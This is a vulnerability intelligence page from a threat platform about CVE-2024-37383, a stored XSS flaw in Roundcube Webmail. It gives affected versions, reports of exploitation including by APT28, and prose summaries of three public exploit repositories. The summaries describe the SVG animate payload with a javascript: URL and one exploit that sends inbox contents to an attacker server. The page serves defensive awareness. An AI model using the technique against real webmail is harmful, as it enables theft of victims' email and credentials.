Stored XSS in Roundcube Webmail via SVG animate attributes
CVE-2024-37383 is a stored cross-site scripting vulnerability in Roundcube Webmail caused by improper processing of SVG animate attributes in email content. It affects Roundcube Webmail before 1.5.7 and 1.6.x before 1.6.7. A remote attacker can send a specially crafted email containing malicious SVG content, including animate-tag based payloads, that bypasses expected syntax checks and executes attacker-controlled JavaScript when the victim opens the message in Roundcube. Reporting on observed exploitation indicates the payload can be embedded in content processed by the client but not visibly rendered to the user, enabling stealthy execution in the security context of the victim’s Roundcube session.
Are you exposed to this one?
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
Impact, mitigation & remediation
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
Impact
What an attacker gets, and what they’ve been doing with it.
Mitigation
If you can’t patch tonight, do this now.
Remediation
Patch, then assume compromise.
Exploits
3 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
Repository is a small PoC/lab for CVE-2024-37383 (Roundcube Webmail SVG parsing XSS). Structure: (1) docker-compose.yml spins up a vulnerable Roundcube instance (roundcube/roundcubemail:1.6.6-apache) and a GreenMail standalone server providing SMTP/IMAP and a web UI. Roundcube is exposed on host port 8080; GreenMail exposes 3000 (web/API), 3143 (IMAP), 3025 (SMTP). (2) send.py is the exploit driver: it connects to SMTP at localhost:3025 and sends an email from/to test@example.com containing a multipart message with a crafted HTML part. The HTML embeds an <svg> with an <animate> element using a malformed attributeName ("href ") and a javascript: URL in values, intended to trigger XSS when the email is viewed in Roundcube. README.md documents affected versions (v1.5.7 and v1.6.x < v1.6.7), setup steps, and links to an analysis report. Overall purpose: provide a reproducible local environment and a minimal script to deliver the malicious email demonstrating the XSS.
This repository contains an operational exploit for CVE-2024-37383, a stored XSS vulnerability in Roundcube Webmail (versions earlier than 1.5.6 and 1.6-1.6.6). The exploit consists of a JavaScript file ('Roundcube_mail_server_exploit_for_CVE-2024-37383.js') and a detailed README. The JavaScript payload is designed to be injected via a crafted email (e.g., using an SVG <animate> tag) and, when executed in the victim's browser, will enumerate all inbox messages, extract their titles and contents, and send them to an attacker-controlled server via POST requests. The README provides step-by-step instructions for configuring the exploit, including setting the target Roundcube instance and the attacker's server endpoint. The exploit is not part of a framework and is a standalone script. The main attack vector is browser-based XSS, requiring the victim to open a malicious email in a vulnerable Roundcube instance. The repository is well-structured, with clear separation between documentation and exploit code.
This repository is a proof-of-concept (POC) exploit for CVE-2024-37383, a stored XSS vulnerability in Roundcube Webmail. The repository contains three files: a README.md with usage instructions, exploit.py (the main exploit script), and start_roudcube.sh (a helper script to launch a local Roundcube instance via Docker). The exploit works by sending a specially crafted HTML email containing an SVG element with an <animate> tag that, when clicked by the victim in the Roundcube webmail interface, triggers a JavaScript alert. The exploit.py script allows the attacker to specify sender and recipient email addresses, SMTP host, and port, making it flexible for different email providers. The start_roudcube.sh script sets up a vulnerable Roundcube instance for testing, using GMX as the default mail provider. The main attack vector is network-based (sending email) and browser-based (victim interaction with the webmail UI). The exploit demonstrates the vulnerability but requires user interaction (clicking the link) to trigger the XSS payload.
Affected products & vendors
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
Recent activity
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Roundcube webmail vulnerability exploited in campaigns.
A cross-site scripting (XSS) vulnerability in Roundcube and Zimbra webmail platforms, exploited for zero-click attacks by APT28.
A cross-site scripting (XSS) vulnerability in Roundcube webmail that was reportedly weaponized to enable zero-click style attacks leading to credential and email data theft via injected malicious code and abuse of the webmail API.
A Roundcube vulnerability referenced as added to CISA KEV for exploitation activity (no additional technical details provided in the content).
The version that knows your environment.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.